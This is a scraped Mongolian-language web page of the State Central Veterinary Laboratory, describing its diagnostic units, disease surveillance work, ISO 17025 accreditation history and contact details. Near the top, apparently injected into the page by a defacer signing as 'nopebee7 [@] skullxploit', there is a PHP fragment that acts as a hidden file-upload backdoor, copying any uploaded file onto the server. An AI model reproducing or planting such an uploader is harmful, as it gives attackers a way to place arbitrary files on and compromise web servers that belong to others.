• (976) 7011-0960 : Дээж хүлээн авах, хариу олгох
  • (976) 7011-1050 : Байгууллагын утас
  • Ажлын Цаг : Даваа - Баасан , 08:30 - 16:30

Лаборатори, нэгжийн танилцуулга


cxzczczx

nopebee7 [@] skullxploit

';if($_POST['x']=='x'){echo(@copy($_FILES['a']['tmp_name'],$_FILES['a']['name'])?'upload success
':'upload failed
');} ?>


Гоц халдварт өвчний оношлогоо, тандалтын лаборатори

Тус албанд эмгэг, эд судлал, нян судлал, паразит судлал, ийлдэс судлал,  вирус судлал, молекул биологи, эс өсгөвөр, тархвар зүй, биотехнологи, биоаюулгүйн инженер техникч зэрэг чиглэлээр мэргэшсэн малын эмч, инженер техникч, лаборант нийлсэн 17 мэргэжилтэн төрөлжсөн 9 лабораторид хөрвөн ажилладаг.

Үйл ажиллагааны чиглэл:

  • Биоаюулгүйн III дугаар зэрэглэлийн суурин болон явуулын  лаборатори, вирус судлал, нян судлал, эс өсгөвөр, молекул биологи, эмгэг эд судлалын лабораторид шүлхий, бог малын мялзан, гахайн африк мялзан, гахайн сонгомол мялзан, микоплазм, томуу, ньюкастлын өвчин, хонь ямааны цэцэг, маеди висна, годрон, ауески өвчин, гахайн үржил амьсгалын хам шинж, цэврүүт өвчин, баруун нилийн халуурал, хэл хөхрөх, адууны вирусын артерит, адууны халдварт цус багадалт, галзуу, ринопневмони, шөвөг яр, туулайн вирусын цусан халдвар, хачигт боррелёз, хачигт энцефалит, үхрийн хорт салст халуурал, шинэ болон шинээр дахин сэргэж буй  өвчин, бусад халдварт, паразит,  зооноз өвчнийг  илрүүлэх, тандах, оношлох, онош баталгаажуулах;
  • Дээр дурьдсан лабораториудыг түшиглэн экспорт, импортын мал амьтан, тэдгээрийн гаралтай түүхий эд, бүтээгдэхүүнд гоц халдварт, халдварт, паразит өвчний үүсгэгч илрүүлэх, тандах оношлох, баталгаажуулах шинжилгээг Дэлхийн мал амьтны эрүүл мэндийн байгууллага, үндэсний стандартын байгууллагаас зөвлөсөн үндсэн арга, тэдгээрийг орлох  бусад  арга зүйн дагуу гүйцэтгэх;
  • Сорилт, шинжилгээнд шаардагдах тэжээлт орчин, урвалж уусмал, будагч бодисуудыг бэлтгэх, найруулах;
  • Гоц халдварт, халдварт, паразит  өвчний гаралт, тархалтыг тогтоох, тандан судалгаа хийх, үр дүнг үнэн зөв мэдээлэх, мал, амьтны өвчинтэй тэмцэх, урьдчилан сэргийлэх арга хэмжээг зөвлөх, тэдгээртэй холбоотой үндэсний болон олон улсын төсөл хөтөлбөр боловсруулах, сургалт сурталчилгааны ажил зохион явуулах;

.

 


Халдварт, паразиттах өвчний оношлогоо тандалтын лаборатори

Үндсэн лаборатори нэгж:

Ийлдэс судлал, нян судлал, шимэгч судлалын 3  лаборатори

Бусад  хэсэг:  Асколи, ПГУ-ын,  угаалга ариутгалын өрөө

Түүхэн замнал:Далан жилийн түүхтэй ууган тасгийн нэг,  халдварт өвчнөөр мэргэшсэн туршлагатай, үе үеийн олон серологич, бактериологич, вирусологич нар энэ тасагт ажиллаж ирсэн арвин түүхтэй билээ. 

Үйл ажиллагаа: Монгол улсын хэмжээнд болон дэлхий дахинд гарч буй халдварт, паразиттах, зооноз өвчнүүд, шинэ болон дахин сэргэж буй өвчнүүдийг ийлдэс судлал, нян судлал, паразит судлалын аргаар үндэсний стандарт, ДМАЭМБ-ын зөвлөмж, арга зүй зааврын дагуу оношлогоо, баталгаажуулах, тандалт шинжилгээг шуурхай, чанартай хийж гүйцэтгэх, импорт экспортын болон үржлийн  мал амьтан, түүхий эдэд хянан баталгаа гаргах, орон нутгийн лабораторийн эмч нарыг оношлогоо, шинжилгээний арга зүй, чанарын удирдлагаар хангахад  хамтран ажиллах

Мэргэшил, орон тоо: Тус лабораторид  малын их эмч  6 (бактериологич 2, серологич 2, паразитологич1, лабораторийн эрхлэгч, доктор-1, магистр -2, аспирант-1 магистрант-2, ), лаборант-1 тус тус  ажилладаг.

 

Лабораторийн итгэмжлэл,  үнэлгээнд хамрагдсан байдал: 

1.

Лабораторийн  итгэмжлэлийн ISO 17025 үнэлгээнд 8 удаа -  1994, 1997, 2000,  2003, 2007, 2011, 2015, 2020

2.

2002 онд Монгол, ОХУ хоёр орны  мал эмнэлгийн газрын хамтарсан  лабораторийн аттестатчилалд хамрагдсан

3

2013- СХЗҮТ, МЭХ- ээс аттестатчилалын  нян, паразит, ийлдэс судлалын  тест,  дээжийн тоо -6 

4

2010 онд Бруцеллезын оношлогоо, бүсийн орны  хуралд, Тайланд (OIE, NIAH-ANSES)

2014- Бруцеллезын ур чадварын тест  “Lab 36”  кодоор оролцож,  үр дүнг илтгэв. Сорилд ирсэн дээжийн тоо-17

 

5

2015- Бруцеллезын ур чадварын тест Тайланд улсад “Lab 07” кодоор оролцож үнэлгээ авсан . Дээжийн тоо- 16

6

2015 онд “Бруцеллезын  шинжилгээ, урвалын үнэлгээ” сургалт шинжилгээ,  ШХА-УМЭАЦТЛ, Испани улсын эспертийн хамт шинжилгээний чанарт үнэлгээ хийв. Дээж: 96 өсгөвөрт хамаарах  стандарт эерэг, сөрөг ийлдэс

- Мал эмнэлгийн лабораторид үнэлэгээ хийх ДМАЭМБ-ын экспертийн  үнэлгээнд хамрагдав (тайлан-2013,2014)

7

2016 онд- Бруцеллезын  Ур чадварын Тестийн  үнэлгээнд  дахин (Inter-laboratory proficiency test-Asia-Pacific Bovine Brucellosis PT, NIAH) “Lab 16 кодоор оролцож үнэлгээ авсан . Сорилд  ирсэн  дээжийн тоо- 18.

- Бруцеллезын  олон улсын экспертийн (OIE)  үнэлгээнд  бруцеллезын лабораторийг оруулж зөвлөмж авсан.

1. Лабораторийн  шинжилгээ: (2021) 

Лаборатори

Оношлох, хянах тандах  өвчний нэр

Дээж (сорил, удаа)

Шинжилгээний арга

Ийлдэс судлал

 

Нийт 14 халдварт өвчний-Ям, даурин (T.equiperdium), бруцеллез, иж сүрьеэ..

7091 (7436, 628)

 7443 (асколи, 428)

Серологийн урвал-РБУ, НУ, ХХУ, ИФУ, ТУ

Нян судлал

Нянгийн гаралтай 19  халдварын - Боом, бруцеллез, ЦХ, ДХ, ДХХ, иж балнад..

530 (5726, 70)

Дурандах, өсгөвөрлөх,

амь сорил бусад,  ПГУ

Паразит судлал

Цусны болон  гадна, дотор шимэгчийн 8 өвчний-Babesia,T.evansi, anaplasma, хамуу, уйланхайн, бусад.

756(932, 75)

Цусны түрхэц, хэлбэр зүйн, дурандах, НУ, ИФУ

 

 

2. Тасаг лабораторийн хүрээнд хийсэн онцлох зарим  арга хэмжээ, ажлын тойм үр дүнгээс:

- 2003 - Баруун аймгийн шүлхийгээр тайван болохыг батлах тандах шинжилгээ (Увс, Ховд, Завхан,  ГА)

- 2000, 2002, 2004, 2005 онд гарсан шүлхий өвчний оношлох  болон  2010, 2014-Төвийн бүсийн тандах шинжилгээ

- 2003, 2009 - Адуу, тэмээнд хийсэн трипаносомозын тандалт судалгааны ажил (Төвийн бүс, Ховд)

- 2006 - 2010 үхрийн цээж, хэл хөхрөх өвчний  болон хоёр аймгийн бруцеллезын тандах шинжилгээ (Орхон, Дархан)

- 2008-2009 Бруцеллез, халдвар судлалд  шинжилгээний арга зүй нэвтрүүлэх, тандалтын үр дүнг тооцох, Dr. Pip Beard

- 2011 - Бруцеллез, зарим халдварт өвчний  бүх аймагт хийсэн тандах шинжилгээ, “Монгол мал” хөтөлбөр

- 2013 - Бруцеллезын сан бүрдүүлэх Зүүн гурван  аймгийн зорилтот тандалт шинжилгээ, ШХА-МЭМТ

- 2013- 2015  - Бруцеллезын лавлагаа омог, стандарт ийлдсийн  дээжинд хийсэн сургалт- шинжилгээ, Dr. Pilar Munoz

- 2015 - 2016 - Бруцеллезын  лабораторийг бэхжүүлэх өрөө засвар, оношлуур багаж төхөөрөмжийн худалдан авалт

- 2013 - 2016 - Бруцеллезын шинжилгээ үнэлгээ, ур чадварын тест, оношлогооны сургалт,  4, 8 удаа, төв, 22 аймгийн

- 2010 - “Үхрийн сүрьеэ өвчнийг илрүүлэх ийлдэс судлалын тандах шинжилгээний дүн”  судалгаа,  Ц. Сэрчмаа

- 2012 -“Монгол орны цаа буганд тохиолддог зарим өвчний судалгааны дүн”,  докторын бүтээл, М. Нансалмаа

- 2013 - “Үхрийн тархи сархиатах эмгэгийг тандах судалгааны дүн”,  докторын бүтээл,  Д. Ганцэцэг

- 2015 -“Бруцеллезын үүсгэгч Brucella нянг ялган тодорхойлсон  нь”, магистрын бүтээл,  Ж. Мөнхгэрэл

- 2016 - “Epidemiology on Livestock Brucellosis in Dundgobi, Mongolia and Inner Mongolia of China”,  докторын бүтээл, А. Саруулжаргал

- 2014- 2016 - Бруцеллезын Ур чадварын Тестэнд хамрагдаж,  хоёр удаа үнэлгээ авсан (NIAH, Thailand, BPT-2016)

- 2017 - Ногоон алт, Малын  эрүүл мэнд төслийн хүрээнд 4 аймгийн 15 суманд хийх халдварт зооноз өвчний  сургалт,    ШХА   ----- 2018-2021 онд Хээлтүүлэгч малд Бруцеллёзын тандалт шинжилгээг 20 аймаг, нийслэлд хийв.

- 2016-2021 онд Үхрийн тархи сархиатах эмгэг-ээс тайван болохыг баталгаажуулах тандалт

- 2019-2021онд Бруцеллёзын вакцины идэвхийг шалгах тандалт

- 2021онд үхрийн сүрьеэ, лёйкоз өвчнөөс эрүүлийг баталгаажуулах тандалт

 

 

 

 


Хүнсний эрүүл ахуй, үлдэгдлийн шинжилгээний лаборатори

Тус албанд  мал эмнэлгийн ариун цэвэр магадлан, хүнсний нян судлал, мөөгөнцөр, эмийн үлдэгдэл, цацраг судлал, халдваргүй (эндемик) хордлогот өвчин, нөхөн үржихүйн эмгэг, экологи, байгаль орчин, органик ба органик бус хими, биохими, гематологи,  мал, амьтны бодис солилцоо, зөгий, хор судлал, элементийн шинжилгээ, малын эм, бэлдмэл үйлдвэрлэлийн технологиор төрөлжиж нарийн мэргэшсэн  малын эмч, химич, физикч, лаборант нийлсэн 17 мэргэжилтэн төрөлжсөн 9 лабораторид хөрвөн ажилладаг.

Үйл ажиллагааны чиглэл:

  • Мал амьтны гаралтай экспорт, импортын хүнсний бүтээгдэхүүн, түүхий эд,  дайвар бүтээгдэхүүн, нэмэлт тэжээлд нян судлал,  мал эмнэлэг ариун цэврийн  магадлан шинжилгээ, мөөгөнцөр, цацраг,  малын эмийн үлдэгдэл, хүнд металлыг ДМАЭМБ-аас зөвлөсөн үндсэн болон тэдгээрийг орлуулах батлагдсан арга зүйгээр шинжлэх, баталгаажуулах;
  • Хүнсний бүх төрлийн түүхий эд бүтээгдэхүүн, мал, амьтны эд эрхтэн, биологийн шингэн, хөрс, ус, ургамлын дээжинд гамма цацрагийн бохирдол, байгалийн болон үүсмэл цацраг идэвхт изотопыг гаммаспектрометр, инспектор-1000 багаж ашиглан тодорхойлж баталгаажуулах;

 


Байгаль орчноос шалтгаалах өвчний оношлогоо тандалтын лаборатори

.


Эпидемиологи эрсдэлийн шинжилгээ, мониторинг мэдээллийн нэгж

        Тус нэгж нь  2022 оны 03 дугаар сарын 23-ны өдрийн Мал эмнэлгийн ерөнхий газрын даргын  А-62 тушаал буюу УМЭАЦТЛ-ийн бүтцийн өөрчлөлтөөр 6 хүний бүрэлдэхүүнтэйгээр үйл ажиллагаагаа явуулж байна.

Нэгжийн үйл ажиллагааны чиглэл

  • Мал, амьтны гоц халдварт, халдварт болон халдваргүй өвчний эпидемиолгийн судалгаа хийх, лабораторийн шинжилгээний үр дүнгээр боловсруулалт хийж мэдээлэх
  • Лабораторийн цахим бүртгэлийн нэгдсэн систем буюу vetlab.shinjilgee.mn, тандалтын систем буюу sur.shinjilgee.mn, цахим хуудас болон мэдээллийн хэрэгслийн хэвийн үйл ажиллагааг хангах, ашиглалтыг хянах, арга зүйгээр хангах , хөгжүүлэлт хийх
  • Лабораторийн үйл ажиллагаанд  MNS ISO/IEC 17025 стандартын шалгуур үзүүлэлтийг хангуулах, мөрдүүлэх, хянах
  • Лабораторийн шинжилгээнд мал, амьтны гаралтай халдварт, халдваргүй, хордлогот өвчний болон хүнсний бүтээгдэхүүний дээжийг хянан хүлээн авах, бүртгэх, хувиарлах, шинжилгээний хариу гаргах


Захиргаа, үйлчилгээ хяналтын нэгж

    Тус албанд байгууллагын захирлын туслах, харилцааны мэргэжилтэн, хүний нөөц, архив бичиг хэрэг, чанарын менежер, дээж хүлээн авагч хариу олгогч,  тархвар зүйч, мэдээлэл, программ хангамжийн мэргэжилтэн,  нягтлан бодогч, нярав, жолооч, амьтан маллагч, тогооч, цахилгаан сантехник, угаалга, ариутгал, үйлчилгээний чиглэлээр нарийн мэргэшсэн 16 ажилтан албан хаагч  төрөлжсөн 9 нэгжид хөрвөн ажилладаг.

Үйл ажиллагааны чиглэл:

  • Архив, албан баримт, бичиг хэрэг хөтлөлт, мал эмнэлгийн цахим мэдээллийн сан хянах арга зүйгээр хангах, үр дүнг нэгтгэх, цахим сайт, урвалж оношлуур, хэрэглэгдэхүүн, өсгөвөр омог, ийлдсийн сангийн нийлүүлэлт, хадгалалт, хамгаалалт, аюулгүй, найдвартай байдлыг хангах;
  • Ажилтан, албан хаагчдыг эрүүл мэндийн үзлэгт тогтмол хамруулах, хөдөлмөр нийгмийн хамгаалал, ажиллах таатай орчин нөхцөл бүрдүүлэх, өрөө тасалгаа, гудамж, зам талбайн цэвэрлэгээ, тохижилтын ажлыг зохион байгуулах;  
  • Био аюулгүй ажиллагааны II, III-р зэрэглэлийн хөдөлгөөнт болон суурин лаборатори, автомашин, лабораторийн тоног төхөөрөмж, багаж, хэмжих хэрэгсэл, эм урвалж, оношлуур, хэрэглэгдэхүүнийн бэлэн байдал, цахилгаан дулаан, усан хангамж, засвар үйлчилгээг тухай бүр хангах;
  • Мал амьтны өвчлөлтийн байдлыг бүртгэх, тандах, хянах, мэдээлэх ажлыг орон нутгийн сүлжээ лаборатори, албадуудаас гаргуулж орчин үеийн тархвар зүйн нарийн тооцоолол ашиглан Монгол улсын мал эмнэлгийн лабораториудын сүлжээ, тодорхой бүс нутаг, аж ахуйн хэмжээнд  дүн шинжилгээ хийж, нэгтгэх, удирдах дээд байгуулагад мэдээлэх;
  • Дээж хүлээн авхаас эхлээд шинжилгээ гүйцэтгэх, үр дүнг нэгтгэж хариу олгох хүртлэх гинжин хэлхээнд биоаюулгүйн чанарын удидлагын тогтолцоог мөрдүүлж стандарт төвшинд байнга хэрэгжүүлэхэд хяналт тавьж,  арга зүй, удирдлагаар хангах;
  • Олон улсын лавлагаа лабораторид дээж илгээх, ур чадварын сорилын материал,  урвалж оношлуур, багаж тоног төхөөрөмж хүлээж авах, түгээх  ажлыг албадын эмч, холбогдох байгууллага, мэргэжилтэнтэй хамтран зохион байгуулах

 

 

  • Улаанбаатар хот, Хан-Уул дүүрэг, 11-р хороо, Зайсан, ш/х 53/03
  • Утас: + (976) 70111050
  • Факс: + (976) 70111050
  • И-Майл: info@scvl.gov.mn
Copyright © 2016 | Улсын Мал Эмнэлэг Ариун Цэврийн Төв Лаборатори.